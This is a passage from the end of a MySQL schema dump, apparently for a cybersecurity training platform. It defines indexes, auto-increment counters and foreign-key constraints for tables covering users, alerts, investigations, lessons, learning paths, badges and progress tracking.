  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `blog_posts`
--
ALTER TABLE `blog_posts`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `slug` (`slug`);

--
-- Indexes for table `feedbacks`
--
ALTER TABLE `feedbacks`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `investigations`
--
ALTER TABLE `investigations`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `alert_id` (`alert_id`);

--
-- Indexes for table `investigation_notes`
--
ALTER TABLE `investigation_notes`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `alert_id` (`alert_id`);

--
-- Indexes for table `learning_paths`
--
ALTER TABLE `learning_paths`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `lesson_content`
--
ALTER TABLE `lesson_content`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_task_content` (`task_id`);

--
-- Indexes for table `lesson_questions`
--
ALTER TABLE `lesson_questions`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_task_order` (`task_id`,`question_order`);

--
-- Indexes for table `modules`
--
ALTER TABLE `modules`
  ADD PRIMARY KEY (`id`),
  ADD KEY `prerequisite_module_id` (`prerequisite_module_id`),
  ADD KEY `idx_modules_path` (`learning_path_id`);

--
-- Indexes for table `notifications`
--
ALTER TABLE `notifications`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `operations`
--
ALTER TABLE `operations`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `operation_alerts`
--
ALTER TABLE `operation_alerts`
  ADD PRIMARY KEY (`id`),
  ADD KEY `operation_id` (`operation_id`),
  ADD KEY `alert_id` (`alert_id`);

--
-- Indexes for table `password_resets`
--
ALTER TABLE `password_resets`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `system_settings`
--
ALTER TABLE `system_settings`
  ADD PRIMARY KEY (`key`);

--
-- Indexes for table `tasks`
--
ALTER TABLE `tasks`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_tasks_module` (`module_id`),
  ADD KEY `fk_task_alert` (`alert_id`);

--
-- Indexes for table `users`
--
ALTER TABLE `users`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `email` (`email`);

--
-- Indexes for table `user_alert_assignments`
--
ALTER TABLE `user_alert_assignments`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_alert_date` (`user_id`,`alert_id`,`assigned_date`),
  ADD KEY `idx_user_date` (`user_id`,`assigned_date`);

--
-- Indexes for table `user_badges`
--
ALTER TABLE `user_badges`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_badge` (`user_id`,`badge_id`),
  ADD KEY `badge_id` (`badge_id`),
  ADD KEY `idx_user_badges_user` (`user_id`);

--
-- Indexes for table `user_lesson_answers`
--
ALTER TABLE `user_lesson_answers`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_question` (`user_id`,`question_id`),
  ADD KEY `question_id` (`question_id`);

--
-- Indexes for table `user_lesson_grades`
--
ALTER TABLE `user_lesson_grades`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_task_grade` (`user_id`,`task_id`),
  ADD KEY `task_id` (`task_id`);

--
-- Indexes for table `user_operation_progress`
--
ALTER TABLE `user_operation_progress`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `operation_id` (`operation_id`);

--
-- Indexes for table `user_path_progress`
--
ALTER TABLE `user_path_progress`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_path` (`user_id`,`learning_path_id`),
  ADD KEY `learning_path_id` (`learning_path_id`),
  ADD KEY `current_module_id` (`current_module_id`),
  ADD KEY `idx_user_path_user` (`user_id`);

--
-- Indexes for table `user_path_specialization`
--
ALTER TABLE `user_path_specialization`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_path` (`user_id`,`path_code`);

--
-- Indexes for table `user_task_progress`
--
ALTER TABLE `user_task_progress`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_task` (`user_id`,`task_id`),
  ADD KEY `idx_user_progress_user` (`user_id`),
  ADD KEY `idx_user_progress_task` (`task_id`);

--
-- Indexes for table `user_xp`
--
ALTER TABLE `user_xp`
  ADD PRIMARY KEY (`user_id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `alerts`
--
ALTER TABLE `alerts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `alert_grades`
--
ALTER TABLE `alert_grades`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `badges`
--
ALTER TABLE `badges`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `blog_posts`
--
ALTER TABLE `blog_posts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=30;

--
-- AUTO_INCREMENT for table `feedbacks`
--
ALTER TABLE `feedbacks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `investigations`
--
ALTER TABLE `investigations`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=101;

--
-- AUTO_INCREMENT for table `investigation_notes`
--
ALTER TABLE `investigation_notes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `learning_paths`
--
ALTER TABLE `learning_paths`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=11;

--
-- AUTO_INCREMENT for table `lesson_content`
--
ALTER TABLE `lesson_content`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1004;

--
-- AUTO_INCREMENT for table `lesson_questions`
--
ALTER TABLE `lesson_questions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7110;

--
-- AUTO_INCREMENT for table `modules`
--
ALTER TABLE `modules`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=125;

--
-- AUTO_INCREMENT for table `notifications`
--
ALTER TABLE `notifications`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `operations`
--
ALTER TABLE `operations`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=60;

--
-- AUTO_INCREMENT for table `operation_alerts`
--
ALTER TABLE `operation_alerts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=314;

--
-- AUTO_INCREMENT for table `password_resets`
--
ALTER TABLE `password_resets`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tasks`
--
ALTER TABLE `tasks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=791;

--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=74;

--
-- AUTO_INCREMENT for table `user_alert_assignments`
--
ALTER TABLE `user_alert_assignments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=11;

--
-- AUTO_INCREMENT for table `user_badges`
--
ALTER TABLE `user_badges`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `user_lesson_answers`
--
ALTER TABLE `user_lesson_answers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=77;

--
-- AUTO_INCREMENT for table `user_lesson_grades`
--
ALTER TABLE `user_lesson_grades`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=31;

--
-- AUTO_INCREMENT for table `user_operation_progress`
--
ALTER TABLE `user_operation_progress`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10;

--
-- AUTO_INCREMENT for table `user_path_progress`
--
ALTER TABLE `user_path_progress`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=81;

--
-- AUTO_INCREMENT for table `user_path_specialization`
--
ALTER TABLE `user_path_specialization`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `user_task_progress`
--
ALTER TABLE `user_task_progress`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=32;

--
-- Constraints for dumped tables
--

--
-- Constraints for table `investigations`
--
ALTER TABLE `investigations`
  ADD CONSTRAINT `investigations_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `investigations_ibfk_2` FOREIGN KEY (`alert_id`) REFERENCES `alerts` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `investigation_notes`
--
ALTER TABLE `investigation_notes`
  ADD CONSTRAINT `notes_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `notes_ibfk_2` FOREIGN KEY (`alert_id`) REFERENCES `alerts` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `lesson_content`
--
ALTER TABLE `lesson_content`
  ADD CONSTRAINT `lesson_content_ibfk_1` FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `lesson_questions`
--
ALTER TABLE `lesson_questions`
  ADD CONSTRAINT `lesson_questions_ibfk_1` FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `modules`
--
ALTER TABLE `modules`
  ADD CONSTRAINT `modules_ibfk_1` FOREIGN KEY (`learning_path_id`) REFERENCES `learning_paths` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `modules_ibfk_2` FOREIGN KEY (`prerequisite_module_id`) REFERENCES `modules` (`id`) ON DELETE SET NULL;

--
-- Constraints for table `tasks`
--
ALTER TABLE `tasks`
  ADD CONSTRAINT `fk_task_alert` FOREIGN KEY (`alert_id`) REFERENCES `alerts` (`id`) ON DELETE SET NULL,
  ADD CONSTRAINT `tasks_ibfk_1` FOREIGN KEY (`module_id`) REFERENCES `modules` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `user_badges`
--
ALTER TABLE `user_badges`
  ADD CONSTRAINT `user_badges_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_badges_ibfk_2` FOREIGN KEY (`badge_id`) REFERENCES `badges` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `user_lesson_answers`
--
ALTER TABLE `user_lesson_answers`
  ADD CONSTRAINT `user_lesson_answers_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_lesson_answers_ibfk_2` FOREIGN KEY (`question_id`) REFERENCES `lesson_questions` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `user_lesson_grades`
--
ALTER TABLE `user_lesson_grades`
  ADD CONSTRAINT `user_lesson_grades_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_lesson_grades_ibfk_2` FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `user_path_progress`
--
ALTER TABLE `user_path_progress`
  ADD CONSTRAINT `user_path_progress_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_path_progress_ibfk_2` FOREIGN KEY (`learning_path_id`) REFERENCES `learning_paths` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_path_progress_ibfk_3` FOREIGN KEY (`current_module_id`) REFERENCES `modules` (`id`) ON DELETE SET NULL;

--
-- Constraints for table `user_task_progress`
--
ALTER TABLE `user_task_progress`
  ADD CONSTRAINT `user_task_progress_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_task_progress_ibfk_2` FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `user_xp`
--
ALTER TABLE `user_xp`
  ADD CONSTRAINT `user_xp_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;

SET FOREIGN_KEY_CHECKS = 1;
